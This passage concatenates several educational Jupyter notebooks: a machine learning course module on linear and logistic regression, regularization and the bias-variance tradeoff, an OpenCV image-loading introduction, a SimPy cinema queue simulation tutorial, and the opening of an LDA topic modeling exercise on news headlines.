(tabular data most commonly stored in excel and csv files or SQL databases) - X can be unstructured (e.g., images, text, voice recording, video) - Y can be categorical, the problem is **classification** (e.g., click or not click on an ad, sick or not sick) - Y can be continuous, the problem is **regression** (e.g., predict house price, stock price, age) - Y can be missing, the problem is **clustering**- **we focus on structured data during the course series!** Structured data| X|feature_1|feature_2|...|feature_j|...|feature_m|Y||-|:-:|:-:|:-:|:-:|:-:|:-:|:-:||__data_point_1__|x_11|x_12|...|x_1j|...|x_1m|__y_1__||__data_point_2__|x_21|x_22|...|x_2j|...|x_2m|__y_2__||__...__|...|...|...|...|...|...|__...__||__data_point_i__|x_i1|x_i2|...|x_ij|...|x_im|__y_i__||__...__|...|...|...|...|...|...|__...__||__data_point_n__|x_n1|x_n2|...|x_nj|...|x_nm|__y_n__| Other areas of ML- unsupervised ML - only the feature matrix X is available, there is no target variable - the goal is to find structure (clusters) in the data - often used in customer segmentation- recommender systems - recommend products to a customer based on what products similar customers enjoyed- reinforcement learning - the learning system, called an agent, can observe the environment, select and perform actions, and get rewards and penalties in return. 
###Markdown Other areas of ML- unsupervised ML - only the feature matrix X is available, there is no target variable - the goal is to find structure (clusters) in the data - often used in customer segmentation- recommender systems - recommend products to a customer based on what products similar customers enjoyed- reinforcement learning - the learning system, called an agent, can observe the environment, select and perform actions, and get rewards and penalties in return. Goal: come up with a strategy to maximize rewards - often used when a virtual environment is available (e.g., games like go or warcraft) - sounds appealing to use in real environments (like self-driving cars), but agents learn slowly, and lots of cars would need to be broken to teach an agent to drive this way- deep learning - uses neural networks and often works with unstructured data - technically deep learning is supervised or unsupervised - extremely successful on large datasets Module 2: Overview of linear and logistic regression with regularization Learning objectives of this module:- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why regularization is important, Supervised ML algorithms: three parts- 1) **a mathematical model ($f$)** is used to convert the feature values into a prediction: $f(X_i) = y_i'$, where $i$ is the $i$th data point in our sample, $X_i$ is a vector, and $y_i'$ is a number. - $f$ is your supervised ML algorithm - it usually has a number of intrinsic parameters- 2) **an optimization algorithm** is used to determine the intrinsic parameter values given the training set - there are various algorithms - e.g., gradient descent, backpropagation- 3) the optimization algorithm minimizes a metric called **the cost function** - the cost function is used to determine the best intrinsic parameters of one model based on the training data Linear Regression ###Code
# these lines are just illustration
# no X_train or y_train are defined yet so it won't run
from sklearn.linear_model import LinearRegression # import the model

LinReg = LinearRegression() # initialize a simple linear regression model
LinReg.fit(X_train,y_train) # we will learn now what happens when you issue this line
###Output
_____no_output_____
###Markdown - This is the **mathematical model**: $f(X_i) = y_i' = \theta_0 + X_{i1} \theta_1 + X_{i2} \theta_2 + ... = \theta_0 + \sum_{j=1}^{m} \theta_j X_{ij}$, where $y_i'$ is the prediction of the linear regression model and $\theta$ are parameters.- The **optimization algorithm** is some form of gradient descent - we won't go into detail, but the basic idea is that gradient descent will find the $\theta$ values that minimize the cost function on the training data- The **cost function** is MSE - mean squared error: $MSE(y,y') = \frac{1}{n}\sum_{i=1}^{n}(y_i'-y_i)^2$ Logistic Regression ###Code
from sklearn.linear_model import LogisticRegression

LogReg = LogisticRegression() # initialize a simple logistic regression model
LogReg.fit(X_train,y_train) # we will learn what happens when you issue this line in classification
###Output
_____no_output_____
###Markdown - the name is misleading, logistic regression is for classification problems!- the model: $f(X_i) = y_i' = \frac{1}{1+e^{-z}}$, where $z = \theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}$- $f(z) = \frac{1}{1+e^{-z}}$ is the sigmoid function which maps real values to be between 0 and 1 such that the real value 0 is mapped to 0.5. - the output of a sigmoid function can be thought of as a predicted probability. ###Code
import numpy as np
import matplotlib.pyplot as plt

def sigmoid(z):
    return 1/(1+np.exp(-z))

z = np.linspace(-7,7,50)
print(z)

plt.plot(z,sigmoid(z))
plt.xlabel('input of linear regression')
plt.ylabel('predicted probability')
plt.title('sigmoid transformation')
plt.savefig('figures/sigmoid_trans.png',dpi=300)
plt.show()
###Output
[-7.         -6.71428571 -6.42857143 -6.14285714 -5.85714286 -5.57142857
 -5.28571429 -5.
 -4.71428571 -4.42857143 -4.14285714 -3.85714286
 -3.57142857 -3.28571429 -3.         -2.71428571 -2.42857143 -2.14285714
 -1.85714286 -1.57142857 -1.28571429 -1.         -0.71428571 -0.42857143
 -0.14285714  0.14285714  0.42857143  0.71428571  1.          1.28571429
  1.57142857  1.85714286  2.14285714  2.42857143  2.71428571  3.
  3.28571429  3.57142857  3.85714286  4.14285714  4.42857143  4.71428571
  5.          5.28571429  5.57142857  5.85714286  6.14285714  6.42857143
  6.71428571  7.        ]
###Markdown - The **optimization algorithm** is some form of gradient descent- the logloss metric is used as the **cost function** in logistic regression: $L(\theta) = - \frac{1}{n}\sum_{i=1}^{n} [y_i\ln(y_i') + (1-y_i)\ln(1-y_i')]$ - two scenarios: - $y_i = 0$ - the left term disappears - $y_i = 1$ - the right term disappears- $\log(0)$ is undefined - $y_i'$ is usually replaced with $\max(\min(y_i',1-10^{-15}),10^{-15})$ to avoid this issue **The extreme cases**- the classifier is confidently wrong - $y_i' = 10^{-15}$ for points in class 1 - $y_i' = 1 - 10^{-15}$ for points in class 0 - both cases contribute a term $\ln(10^{-15})$, so $logloss = -\frac{1}{n}\sum_{i=1}^{n} \ln(10^{-15}) = -\ln(10^{-15}) \approx 34.5$- the classifier is correct - $y_i' = 10^{-15}$ for points in class 0 - $y_i' = 1 - 10^{-15}$ for points in class 1 - both cases contribute a term $\ln(1-10^{-15})$, so $logloss = -\frac{1}{n}\sum_{i=1}^{n} \ln(1-10^{-15}) = -\ln(1-10^{-15}) \approx 10^{-15}$, i.e., $logloss \sim 0$- the logloss metric also needs to be minimized (a quick numeric check of these two extremes follows below)
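This cell is not part of the original notebook; it is a minimal sketch that reproduces the two extreme logloss values derived above (the helper name `clipped_logloss` is made up): ###Code
import numpy as np

def clipped_logloss(y, p, eps=1e-15):
    # clip the predicted probabilities away from 0 and 1 so the logs stay finite
    p = np.clip(p, eps, 1 - eps)
    return -np.mean(y * np.log(p) + (1 - y) * np.log(1 - p))

y = np.array([0, 1])
# confidently wrong: predict ~1 for the class 0 point and ~0 for the class 1 point
print(clipped_logloss(y, np.array([1.0, 0.0]))) # -ln(1e-15), roughly 34.5
# confidently right: predict ~0 for the class 0 point and ~1 for the class 1 point
print(clipped_logloss(y, np.array([0.0, 1.0]))) # roughly 1e-15, i.e., ~0
###Output
_____no_output_____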
###Markdown Regularization- models tend to overfit on the training data and such models don't perform well on previously unseen points - a sure sign of overfitting in linear and logistic regression is huge theta values, much larger than the typical ranges of your features and target variable - overfitting means that the model fits the noise rather than the underlying structure - e.g., fitting a high degree polynomial to a roughly linearly correlated set of points- one way to address this shortcoming of ML models is regularization- let's change the cost function and add a penalty term for large thetas- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) =$ original cost $+ \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) =$ original cost $+ \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$- $\alpha$ is the regularization parameter (0 or larger); it describes how much we penalize large thetas Regularization in linear regression- the original cost function is MSE and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij} - y_i)^2 + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij} - y_i)^2 + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Regularization in logistic regression- the original cost is logloss and we add the penalty term; writing $z_i = \theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}$ for readability:- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) = - \frac{1}{n}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-z_i}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-z_i}})] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$- **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) = - \frac{1}{n}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-z_i}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-z_i}})] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Let's translate these concepts to code in the next module! Module 3: The bias-variance tradeoff Learning objectives of this module:- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. ###Code
# STEP 1: read in the data
# https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html
# IID - independent and identically distributed dataset
import pandas as pd

df = pd.read_csv('https://www4.stat.ncsu.edu/~boos/var.select/diabetes.tab.txt',delimiter='\t')
print(df.head())

# separate out the feature matrix and the target variable
y = df.iloc[:,-1] # the last column is the target variable
X = df.iloc[:,:-1] # all but the last column are the features
print(y.head())
print(X.head())

# STEP 2: split the data
from sklearn.model_selection import train_test_split

X_other, X_test, y_other, y_test = train_test_split(X,y,test_size=0.2,random_state=1)
X_train, X_val, y_train, y_val = train_test_split(X_other,y_other,test_size=0.25,random_state=1)

# verify the results
print(X_train.shape) # 60% for training
print(X_val.shape) # 20% for validation
print(X_test.shape) # 20% for testing

# STEP 3: preprocess the data
from sklearn.preprocessing import StandardScaler

scaler = StandardScaler() # initialize the scaler
X_train_prep = scaler.fit_transform(X_train)
X_val_prep = scaler.transform(X_val)
X_test_prep = scaler.transform(X_test)
# the _prep objects are now numpy arrays

# let's verify that all feature means are 0 and stds are 1
print(np.mean(X_train_prep,axis=0))
print(np.std(X_train_prep,axis=0))
print(np.mean(X_val_prep,axis=0)) # not exactly 0
print(np.std(X_val_prep,axis=0)) # not exactly 1
print(np.mean(X_test_prep,axis=0)) # not exactly 0
print(np.std(X_test_prep,axis=0)) # not exactly 1

# STEP 4:
# train linear regression models
# tune the regularization parameter
# calculate and visualize train and validation scores
# select the model that performs best on the validation set
# calculate the generalization error using the test set
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error

alphas = np.logspace(-2,2,13)
print(alphas)

train_scores = []
val_scores = []
models = []

for alpha in alphas:
    # initialize the model
    linreg = Lasso(alpha=alpha)
    # fit it to the training set
    linreg.fit(X_train_prep,y_train)
    # save the model
    models.append(linreg)
    # calculate and save train score
    y_train_pred = linreg.predict(X_train_prep)
    train_score = mean_squared_error(y_train,y_train_pred,squared=False)
    train_scores.append(train_score)
    # calculate and save val score
    y_val_pred = linreg.predict(X_val_prep)
    val_score = mean_squared_error(y_val,y_val_pred,squared=False)
    val_scores.append(val_score)

# let's visualize the train and validation scores
plt.plot(alphas,train_scores,label='train score')
plt.plot(alphas,val_scores,label='validation score')
plt.xlabel('regularization strength (alpha)',fontsize=13)
plt.ylabel('RMSE',fontsize=13)
plt.semilogx()
plt.legend(fontsize=13)
plt.savefig('figures/bias-variance.png',dpi=300)
plt.show()
###Output
[1.00000000e-02 2.15443469e-02 4.64158883e-02 1.00000000e-01
 2.15443469e-01 4.64158883e-01 1.00000000e+00 2.15443469e+00
 4.64158883e+00 1.00000000e+01 2.15443469e+01 4.64158883e+01
 1.00000000e+02]
###Markdown The bias-variance tradeoff- high alpha (strong regularization): - the model is too simple - it performs poorly on both the training and validation sets (RMSEs are large) - a high-bias, low-variance model- low alpha (weak regularization): - the model is too complex - it performs very well on the training set but it performs comparatively poorly on the validation set - a low-bias, high-variance model- we are looking for the sweet spot in between - if your evaluation metric needs to be minimized (e.g., MSE, RMSE, logloss) - select the alpha with the smallest validation score - the corresponding model is the best - if your evaluation metric needs to be maximized (e.g., accuracy, R2) - select the alpha with the largest validation score - the corresponding model is the best Let's select the best model and calculate the generalization error ###Code
indx = np.argmin(val_scores)
print('best alpha:',alphas[indx]) # the best alpha value
print('best validation score:',val_scores[indx]) # the validation score
final_model = models[indx] # pull out the best model
y_test_pred = final_model.predict(X_test_prep)
gen_error = mean_squared_error(y_test,y_test_pred,squared=False)
print('the generalization error:',gen_error) # the error we expect from the model on previously unseen data
###Output
best alpha: 2.154434690031882
best validation score: 57.4873819354221
the generalization error: 54.72060685174691
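###Markdown Extra: the same tuning workflow for classification This cell is not part of the original notebook; it is a hedged sketch of the tuning loop applied to logistic regression, using sklearn's built-in breast cancer dataset as a stand-in. Note that sklearn's `C` is the inverse of the regularization strength, so a small `C` means strong regularization. ###Code
from sklearn.datasets import load_breast_cancer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import numpy as np

X, y = load_breast_cancer(return_X_y=True)
X_tr, X_v, y_tr, y_v = train_test_split(X, y, test_size=0.25, random_state=1)
scaler = StandardScaler()
X_tr = scaler.fit_transform(X_tr)
X_v = scaler.transform(X_v)

for C in np.logspace(-3, 3, 7):
    logreg = LogisticRegression(C=C, max_iter=5000) # l2 (ridge) penalty by default
    logreg.fit(X_tr, y_tr)
    val_logloss = log_loss(y_v, logreg.predict_proba(X_v)[:, 1])
    print(C, val_logloss) # pick the C with the smallest validation logloss
###Output
_____no_output_____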
00_Introduction_OpenDisplayImages.ipynb
###Markdown *This notebook is a part of a series, [Learning image manipulation in Python](find), that covers the basics of working with images in [OpenCV](https://docs.opencv.org/), [Matplotlib](https://matplotlib.org/users/index.html) and [Numpy](https://numpy.org/doc/).* Introduction: Opening and displaying images Installing libraries We will primarily be working with OpenCV (cv2) to manipulate images. Install OpenCV in Anaconda from here: https://anaconda.org/conda-forge/opencv `conda install -c conda-forge opencv` ###Code
from matplotlib import pyplot as plt
import cv2

print(cv2.__version__)
###Output
3.4.2
###Markdown Loading images You can use `cv2.imread()` to load an image file. ###Code
image = cv2.imread("images/rgb.jpg")

# Remember shape returns a tuple with the number of rows (height) first
height, width, channels = image.shape
print('%d high by %d wide with %d channels' % (height, width, channels))
###Output
512 high by 512 wide with 3 channels
###Markdown Displaying images You can use `matplotlib.pyplot` (referenced here as `plt`) to display the image. Note that cv2 orders the color channels blue, green then red, while matplotlib uses red, green then blue. To address this you can use `cv2.cvtColor()` to change the order before display. You can use the `axis()` and `title()` methods of pyplot to adjust the appearance. ###Code
imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

# Display original image using matplotlib
plt.imshow(image)
plt.axis('off')
plt.title('Incorrect (BGR image)')
plt.show()

# Display converted image using matplotlib
plt.imshow(imageRGB)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
_____no_output_____
###Markdown Loading images from URL The OpenCV `cv2.imread()` method is not able to read directly from a URL, but scikit-image's (skimage) `io.imread()` method is. That method loads an image in RGB channel order, so no conversion is needed. ###Code
from skimage import io

url = 'https://github.com/Algorithmic-Lens/Learning-image-manipulation-in-Python/raw/master/images/rgb.jpg'
remoteImage = io.imread(url)

# Display image using matplotlib
plt.imshow(remoteImage)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
_____no_output_____
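###Markdown Saving images (extra) This cell is not part of the original notebook; it is a hedged example of a common next step - converting a copy of the loaded image to grayscale with `cv2.cvtColor()` and writing it to disk with `cv2.imwrite()` (the output filename is made up): ###Code
# convert the BGR image to a single-channel grayscale image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
print(gray.shape)  # (height, width) - the channel axis is gone

# cv2.imwrite infers the file format from the extension
cv2.imwrite("images/rgb_gray.jpg", gray)
###Output
_____no_output_____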
src/simpy/cinema_example (realpython).ipynb
###Markdown Table of Contents: Example - Cinema Simulation | Define the problem | Brainstorm the algorithm | Define libraries | Code: class definition | Define the function | Run the simulation Example - Cinema Simulation Simulating Real-World Processes in Python with SimPy Work through another example of using SimPy from [realpython.com](https://realpython.com/simpy-simulating-with-python/) Define the problem The first step of running a simulation is to choose a process to model. In this example, we will imagine we are consulting for a small cinema chain that has bad reviews due to long waiting times. The company has done some research and found out that the average customer is willing to wait for at most **10 minutes** between arriving at the venue and being seated. Therefore, the problem has been formulated as helping to **get wait times below 10 minutes**. Brainstorm the algorithm Before approaching the problem from a coding perspective, first work out how the process works in real life. This will ensure that the code is an accurate reflection of what happens in real life. First, list the possible steps someone who visits the cinema would face. Steps on entering a cinema:1. **Arrive** at venue2. **Queue** to buy ticket3. **Buy** ticket4. **Queue** to get ticket checked 5. **Get** ticket checked6. **Decide** whether to get drinks/food: - If yes, **purchase drinks/food** - If no, go to the last step7. **Go** directly to the seat Now that we have defined the steps above, we can see which parts of the process can be controlled by the cinema chain itself. An example would be how long a customer waits before buying their ticket or drinks/food, which can be controlled by the number of staff serving these customers. There are parts of the process that cannot be controlled, such as when the customers arrive at the venue, or in what volume they will arrive. Since we cannot accurately guess these numbers, they will have to be estimated from available data to determine an appropriate arrival time. Define libraries ###Code
import random
import statistics

import simpy

print(simpy.__version__)
###Output
4.0.1
###Markdown The goal is to find the optimal number of employees giving an average wait time of **less than 10 minutes**. To define and solve this problem, we will collect a list of waiting times for each customer, from when they enter the venue to when they sit down. ###Code
waiting_times = []
###Output
_____no_output_____
###Markdown Code: class definition Build the blueprint for the system: the environment in which the events will happen, such as people moving from one place to another. The environment (`env`) is passed into the class, which we name `Cinema`. ###Code
class Cinema(object):
    def __init__(self, env):
        self.env = env
###Output
_____no_output_____
###Markdown Consider what might be in the Cinema to add to the simulation. As outlined in the steps above, there will be staff to sell tickets and refreshments (drinks/food). Therefore, from the cinema's perspective, the staff are a **resource** who assist the customers in **purchasing items**. We can then frame the problem as: how does the waiting time change depending on the number of staff in each simulation? So, the next variable to declare in the class is `num_staff`, which is vital to the resulting waiting time.
###Code
class Cinema(object):
    def __init__(self, env, num_staff):
        self.env = env
        self.staff = simpy.Resource(env, num_staff)
###Output
_____no_output_____
###Markdown We know that purchasing a ticket is going to take a certain amount of time, so either use historical data for this, or provide an estimate for this process time. This time can be a range, since the size of the party could be different. In this example we will estimate that it takes between 1 and 3 minutes to buy a ticket. We will use the `timeout` method from SimPy to mimic this behaviour. ###Code
class Cinema(object):
    def __init__(self, env, num_staff):
        self.env = env
        self.staff = simpy.Resource(env, num_staff)

    # customer must be passed as a parameter, since they cause the event to occur.
    def purchase_ticket(self, customer):
        yield self.env.timeout(random.randint(1,3))
###Output
_____no_output_____
###Markdown Declare two more resources: - Staff to check tickets - Staff to serve food/drinks These two tasks take a different amount of time, so as before either use historical data, or provide a best guess. ###Code
class Cinema(object):
    def __init__(self, env, num_staff, num_checkers, num_servers):
        self.env = env
        self.staff = simpy.Resource(env, num_staff)
        # ticket checker
        self.checker = simpy.Resource(env, num_checkers)
        # food/drinks server
        self.server = simpy.Resource(env, num_servers)

    # customer must be passed as a parameter, since they cause the event to occur.
    def purchase_ticket(self, customer):
        # process of a customer buying a ticket
        yield self.env.timeout(random.randint(1, 3))

    def check_ticket(self, customer):
        # process of a member of staff checking a ticket
        # this is defined as 3 seconds, so we don't need a random number
        yield self.env.timeout(3/60)

    def sell_food(self, customer):
        # process of staff selling food
        yield self.env.timeout(random.randint(1, 5))
###Output
_____no_output_____
###Markdown Define the function The environment has been set up by the class above, with the resources and processes defined. All that is left is for a customer to enter the process. In process terms, they will:- arrive at the venue- request a resource- wait for the process to complete- leave Create a function to simulate this process ###Code
def go_to_cinema(env, customer, cinema):
    # the customer will be controlled by the environment, so env is passed in as the first param
    # the variable customer tracks each person moving through the system
    # the final parameter allows us to access the processes defined in the Cinema class

    # store the arrival time to see when the customer arrives
    arrival_time = env.now
###Output
_____no_output_____
###Markdown Each of the processes from the Cinema should have corresponding requests in `go_to_cinema()`. The first process in the class is `purchase_ticket()`, using a `staff` resource. Below is a summary of the processes in the `cinema`, and the request made in the `go_to_cinema` method. | Process in cinema | Request in `go_to_cinema()`|| ------------- |:-------------:| | `purchase_ticket()` | request a member of `staff` | | `check_ticket()` | request a `checker`| | `sell_food()` | request a `server`| A member of `staff` is a shared resource in the process, so a customer can use the same member of staff, but this member of staff can only help one customer at a time. This needs to be accounted for.
###Code
def go_to_cinema(env, customer, cinema):
    # the customer will be controlled by the environment, so env is passed in as the first param
    # the variable customer tracks each person moving through the system
    # the final parameter allows us to access the processes defined in the Cinema class

    # store the arrival time to see when the customer arrives
    arrival_time = env.now

    with cinema.staff.request() as request:
        yield request
        yield env.process(cinema.purchase_ticket(customer))
###Output
_____no_output_____
###Markdown For the above, we see:- `cinema.staff.request()`: the customer causes a request to call a member of staff, using a `staff` resource- `yield request`: the customer waits for a `staff` to become available if all are currently in use- `yield env.process()`: the customer uses an available member of `staff` to complete the given process, in this case to purchase the ticket using the class method `cinema.purchase_ticket()`. Once a member of staff is freed up, the `customer` will spend time buying their ticket. `env.process()` tells the simulation to go to the `Cinema` instance and run the `purchase_ticket()` process on the `customer`. The customer will repeat the **request, use, release** cycle to get their ticket checked. ###Code
def go_to_cinema(env, customer, cinema):
    # the customer will be controlled by the environment, so env is passed in as the first param
    # the variable customer tracks each person moving through the system
    # the final parameter allows us to access the processes defined in the Cinema class

    # store the arrival time to see when the customer arrives
    arrival_time = env.now

    with cinema.staff.request() as request:
        yield request
        yield env.process(cinema.purchase_ticket(customer))

    with cinema.checker.request() as request:
        yield request
        yield env.process(cinema.check_ticket(customer))
###Output
_____no_output_____
###Markdown The next part is to add the optional step of buying food/drinks. Whether a customer does this is a random choice, so we add that randomness to the function. ###Code
def go_to_cinema(env, customer, cinema):
    # the customer will be controlled by the environment, so env is passed in as the first param
    # the variable customer tracks each person moving through the system
    # the final parameter allows us to access the processes defined in the Cinema class

    # store the arrival time to see when the customer arrives
    arrival_time = env.now

    with cinema.staff.request() as request:
        yield request
        yield env.process(cinema.purchase_ticket(customer))

    with cinema.checker.request() as request:
        yield request
        yield env.process(cinema.check_ticket(customer))

    if random.choice([True, False]):
        # here the outcome could either be that they go and buy food,
        # or they simply go straight to their seat
        # (per the table above, sell_food() uses a server resource)
        with cinema.server.request() as request:
            yield request
            yield env.process(cinema.sell_food(customer))

    waiting_times.append(env.now - arrival_time)
###Output
_____no_output_____
###Markdown Here, `env.now` will give the time at which the customer has finished all the processes and made it to their seat, so we add the overall time to the `waiting_times` list. Define a function to run the simulation: `run_cinema()` is responsible for creating an instance of the cinema and generating customers until the simulation stops. We start the simulation with a few customers waiting at the cinema, as they might be there as soon as the box office opens. Then, customers will arrive at some average rate, which we can guess will be one every 12 seconds (0.2 minutes), so we will tell the function to wait this long before generating a new customer.
###Code
def run_cinema(env, num_staff, num_checkers, num_servers):
    cinema = Cinema(env, num_staff, num_checkers, num_servers)

    for customer in range(3):
        # this will tell the simulation to move the customers through the cinema
        env.process(go_to_cinema(env, customer, cinema))

    while True:
        yield env.timeout(0.2)  # waiting time before a new customer comes (0.2 min = 12 s)

        # increment the customer by 1, and generate the next person
        customer += 1
        env.process(go_to_cinema(env, customer, cinema))
###Output
_____no_output_____
###Markdown To calculate the wait time, we have a list of waiting times (the time taken for each customer to make it to their seat), `waiting_times`. Take the average to get the average wait time. Define a function to do this ###Code
def calculate_wait_time(waiting_times):
    average_wait = statistics.mean(waiting_times)
    # pretty print results
    minutes, frac_mins = divmod(average_wait, 1)
    seconds = frac_mins * 60
    return round(minutes), round(seconds)
###Output
_____no_output_____
###Markdown Specify a user input function to define the number of staff that will be working, in the roles of staff (`num_staff`), checkers (`num_checkers`) and servers (`num_servers`). We would like to change the above variables to see how the simulation changes. If a popular film has many customers lining up outside, how many people should be on staff to sell the tickets? Will there be big queues of people waiting for food/drink? What value for `num_servers` will help ease the flow? Create a helper function for the user to change the values of the above parameters to try different scenarios. ###Code
def get_user_input():
    num_staff = input("Input # staff working:")
    num_checkers = input("Input # checkers working:")
    num_servers = input("Input # servers working:")
    params = [num_staff, num_checkers, num_servers]
    if all(str(i).isdigit() for i in params):
        params = [int(x) for x in params]
    else:
        print("Couldn't parse input. Simulation will use default values of \n"
              "1 for staff, checker and server")
        params = [1, 1, 1]
    return params
###Output
_____no_output_____
###Markdown Now we will create the final function, `main()`, which ensures the script runs in proper order when you execute it in the command line. ###Code
def main():
    random.seed(42)
    num_staff, num_checkers, num_servers = get_user_input()

    env = simpy.Environment()
    env.process(run_cinema(env, num_staff, num_checkers, num_servers))
    env.run(until=90)

    # print(waiting_times)
    mins, secs = calculate_wait_time(waiting_times)
    print(f"Running simulation... \n"
          f"The average wait time is {mins} minutes and {secs} seconds")
###Output
_____no_output_____
###Markdown Let's look at an overview of all of the functions and classes we have:- `Cinema`: class and blueprint for the environment to simulate. Contains information such as what resources are available, and what the processes are- `go_to_cinema`: this function makes a request to use a resource, goes through the full process, and then releases it to the next customer- `run_cinema`: this controls the simulation. It uses the `Cinema` class blueprint to create an instance of the cinema, and then calls `go_to_cinema` to generate and move people through the cinema- `calculate_wait_time`: finds the average time it takes someone to go through the cinema and formats it so the final output is easy to read. Run the simulation Now let's run the simulation by inputting the values requested. Running it with different values, we can see how the wait time can be reduced.
###Code main() main() main() main() main() main() ###Output Input # staff working:30 Input # checkers working:10 Input # servers working:20 Running simulation... The average wait time is 12 minutes and 58 seconds
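###Markdown The interactive prompt makes it tedious to compare scenarios. This extra cell is a hedged sketch (not part of the original tutorial): it reuses `run_cinema()`, `calculate_wait_time()` and the global `waiting_times` defined above to sweep a few made-up staffing levels programmatically. ###Code
for num_staff in [1, 5, 10, 20]:
    random.seed(42)        # same randomness for each scenario
    waiting_times.clear()  # reset the shared results list between runs
    env = simpy.Environment()
    env.process(run_cinema(env, num_staff, num_checkers=5, num_servers=5))
    env.run(until=90)
    mins, secs = calculate_wait_time(waiting_times)
    print(f"staff={num_staff}: average wait {mins} min {secs} s")
###Output
_____no_output_____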
Exercises/topic-modeling/Latent_dirichlet_allocation.ipynb
###Markdown Step 0: Latent Dirichlet Allocation LDA is used to classify text in a document to a particular topic. It builds a topic per document model and a words per topic model, modeled as Dirichlet distributions. * Each document is modeled as a multinomial distribution of topics and each topic is modeled as a multinomial distribution of words.* LDA assumes that every chunk of text we feed into it will contain words that are somehow related. Therefore choosing the right corpus of data is crucial. * It also assumes documents are produced from a mixture of topics. Those topics then generate words based on their probability distribution. Step 1: Load the dataset The dataset we'll use is a list of over one million news headlines published over a period of 15 years. We'll start by loading it from the `abcnews-date-text.csv` file. ###Code
'''
Load the dataset from the CSV and save it to 'data_text'
'''
import pandas as pd

data = pd.read_csv('abcnews-date-text.csv', error_bad_lines=False)

# We only need the Headlines text column from the data
data_text = data[:300000][['headline_text']]
data_text['index'] = data_text.index

documents = data_text
###Output
_____no_output_____
###Markdown Let's glance at the dataset: ###Code
'''
Get the total number of documents
'''
print(len(documents))
documents[:5]
###Output
_____no_output_____
###Markdown Step 2: Data Preprocessing We will perform the following steps:* **Tokenization**: Split the text into sentences and the sentences into words. Lowercase the words and remove punctuation.* Words that have fewer than 3 characters are removed.* All **stopwords** are removed.* Words are **lemmatized** - words in third person are changed to first person and verbs in past and future tenses are changed into present.* Words are **stemmed** - words are reduced to their root form. ###Code
'''
Loading Gensim and nltk libraries
'''
# pip install gensim
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
np.random.seed(400)

import nltk
nltk.download('wordnet')
###Output
[nltk_data] Downloading package wordnet to /root/nltk_data...
[nltk_data]   Unzipping corpora/wordnet.zip.
###Markdown Lemmatizer Example Before preprocessing our dataset, let's first look at a lemmatization example. What would the output be if we lemmatized the word 'went'? ###Code
print(WordNetLemmatizer().lemmatize('went', pos = 'v')) # past tense to present tense
###Output
go
###Markdown Stemmer Example Let's also look at a stemming example.
Let's throw a number of words at the stemmer and see how it deals with each one: ###Code
stemmer = SnowballStemmer("english")

original_words = ['caresses', 'flies', 'dies', 'mules', 'denied','died', 'agreed', 'owned',
                  'humbled', 'sized','meeting', 'stating', 'siezing', 'itemization','sensational',
                  'traditional', 'reference', 'colonizer','plotted']
singles = [stemmer.stem(plural) for plural in original_words]

pd.DataFrame(data={'original word':original_words, 'stemmed':singles })
'''
Write a function to perform the preprocessing steps on the entire dataset
'''
def lemmatize_stemming(text):
    return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))

# Tokenize and lemmatize
def preprocess(text):
    #result=[]
    #for token in gensim.utils.simple_preprocess(text) :
    #    if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
    #        # TODO: Apply lemmatize_stemming() on the token, then add to the results list
    #        result.append(lemmatize_stemming(token))
    result = [ lemmatize_stemming(token) for token in gensim.utils.simple_preprocess(text)
               if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3 ]
    return result
'''
Preview a document after preprocessing
'''
document_num = 4310
doc_sample = documents[documents['index'] == document_num].values[0][0]

print("Original document: ")
words = []
for word in doc_sample.split(' '):
    words.append(word)
print(words)
print("\n\nTokenized and lemmatized document: ")
print(preprocess(doc_sample))
documents
###Output
_____no_output_____
###Markdown Let's now preprocess all the news headlines we have. To do that, let's use the [map](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.map.html) function from pandas to apply `preprocess()` to the `headline_text` column. **Note**: This may take a few minutes (it takes about 6 minutes on my laptop) ###Code
# TODO: preprocess all the headlines, saving the list of results as 'processed_docs'
processed_docs = documents['headline_text'].map(lambda headline: preprocess(headline))
'''
Preview 'processed_docs'
'''
processed_docs[:10]
###Output
_____no_output_____
